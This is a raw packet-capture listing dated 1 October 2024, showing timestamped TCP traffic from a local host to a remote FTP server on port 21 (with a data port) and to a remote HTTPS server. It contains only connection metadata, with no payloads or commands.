                                            Oct 1, 2024 07:31:46.003782034 CEST4971221192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:46.008733034 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:46.008838892 CEST4971221192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:46.627922058 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:46.645164967 CEST4971221192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:46.650095940 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:46.868467093 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:46.868599892 CEST4971221192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:46.873395920 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:47.117877960 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:47.118001938 CEST4971221192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:47.123260021 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:47.292089939 CEST4970621192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:47.341084957 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:47.341229916 CEST4971221192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:47.346046925 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:47.564277887 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:47.564481974 CEST4971221192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:47.569282055 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:47.787836075 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:47.788686037 CEST4971221192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:47.793488979 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:48.011962891 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:48.012667894 CEST4971361512192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:48.017553091 CEST61512497135.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:48.017798901 CEST4971361512192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:48.017800093 CEST4971221192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:48.022728920 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:48.641787052 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:48.642241001 CEST4971361512192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:48.642241001 CEST4971361512192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:48.647466898 CEST61512497135.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:48.647558928 CEST61512497135.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:48.647690058 CEST4971361512192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:48.757118940 CEST4971221192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:48.866142035 CEST21497125.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:48.913368940 CEST4971221192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:49.950342894 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:49.950395107 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:49.950472116 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:49.954865932 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:49.954885960 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.470335007 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.470448971 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.472415924 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.472421885 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.472665071 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.518593073 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.559411049 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.641388893 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.641415119 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.641422987 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.641515970 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.641529083 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.662676096 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.662758112 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.662775993 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.710225105 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.732358932 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.732369900 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.732399940 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.732475996 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.732475996 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.733143091 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.733150959 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.733197927 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.734034061 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.734044075 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.734087944 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.753274918 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.753289938 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.753362894 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.822995901 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.823010921 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.823108912 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.823158026 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.823167086 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.823215008 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.823998928 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.824115992 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.824876070 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.824935913 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.825742960 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.825799942 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.826598883 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.826656103 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.844047070 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.844111919 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.913959980 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.914041042 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.914120913 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.914184093 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.914288998 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.914355993 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.914670944 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.914726973 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.915698051 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.915740967 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.915754080 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.915767908 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.915788889 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.915811062 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.916403055 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.916460991 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.916548967 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.916610003 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.917392015 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.917448997 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.918313980 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.918359041 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.918373108 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.918385029 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.918405056 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.918425083 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.934572935 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.934644938 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.934921980 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.934983969 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:50.935189962 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:50.935245991 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.004189968 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.004348993 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.004353046 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.004378080 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.004405022 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.004422903 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.004575014 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.004643917 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.005036116 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.005112886 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.005309105 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.005381107 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.005772114 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.005867958 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.005968094 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.006011009 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.006042004 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.006051064 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.006062984 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.006094933 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.006843090 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.006901979 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.007049084 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.007117987 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.007129908 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.007139921 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.007169008 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.007183075 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.007724047 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.007766962 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.007776022 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.007785082 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.007810116 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.007824898 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.025310993 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.025409937 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.025492907 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.025548935 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.025670052 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.025728941 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.094871044 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.094944000 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.095045090 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.095104933 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.095242023 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.095305920 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.095330000 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.095419884 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.095722914 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.095773935 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.821314096 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.821369886 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.821424007 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.821547031 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.821604013 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.821690083 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.821747065 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.821902037 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.821969032 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.822094917 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.822150946 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.822171926 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.822227955 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.822232962 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.822246075 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.822287083 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.822720051 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.822767019 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.822793007 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.822805882 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.822829008 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.822855949 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.842120886 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.842202902 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.842235088 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.842294931 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.842365980 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.842437029 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.851912022 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.852011919 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.911691904 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.911742926 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.911767960 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.911792994 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.911808014 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.911828995 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.911942005 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.911997080 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.912059069 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.912107944 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.912307978 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.912357092 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.912507057 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.912549019 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.912553072 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.912563086 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.912592888 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.912724018 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.912779093 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.912930965 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.912978888 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.913121939 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.913173914 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.913176060 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.913194895 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.913223982 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.913240910 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.913242102 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.913254023 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.913285017 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.913330078 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.913635969 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.913683891 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.915369034 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.915447950 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.932881117 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.932938099 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.932950020 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.932975054 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.932990074 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.933008909 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.933191061 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.933243990 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.002676964 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.002763033 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.002805948 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.002859116 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.002909899 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.002965927 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.003070116 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.003117085 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.003247023 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.003299952 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.003412008 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.003460884 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.003490925 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.003545046 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.003777027 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.003896952 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.003968954 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.004020929 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.004036903 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.004085064 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.004158974 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.004216909 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.004420996 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.004468918 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.004587889 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.004679918 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.005613089 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.005696058 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.023673058 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.023729086 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.023751974 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.023770094 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.023792028 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.023813963 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.023857117 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.023910046 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.093332052 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.093399048 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.093410969 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.093430996 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.093458891 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.093475103 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.093486071 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.093535900 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.093779087 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.093835115 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.093940020 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.094043970 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.094119072 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.094155073 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.094175100 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.094181061 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.094199896 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.094218969 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.094266891 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.094316006 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.094703913 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.094759941 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.094944954 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.094985962 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.095001936 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.095011950 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.095022917 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.095046043 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.095135927 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.095191002 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.095316887 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.095356941 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.095366001 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.095371962 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.095397949 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.095413923 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.114428997 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.114465952 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.114541054 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.114561081 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.114574909 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.114597082 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.114703894 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.114757061 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.184653044 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.184751034 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.184753895 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.184799910 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.212735891 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:54.126929045 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:54.131827116 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:54.131902933 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:54.746680975 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:54.750654936 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:54.755502939 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:54.970118046 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:54.972088099 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:54.976918936 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.214142084 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.214277029 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:55.219082117 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.433476925 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.433727980 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:55.438534021 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.653544903 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.653718948 CEST4971521192.168.2.85.2.84.236
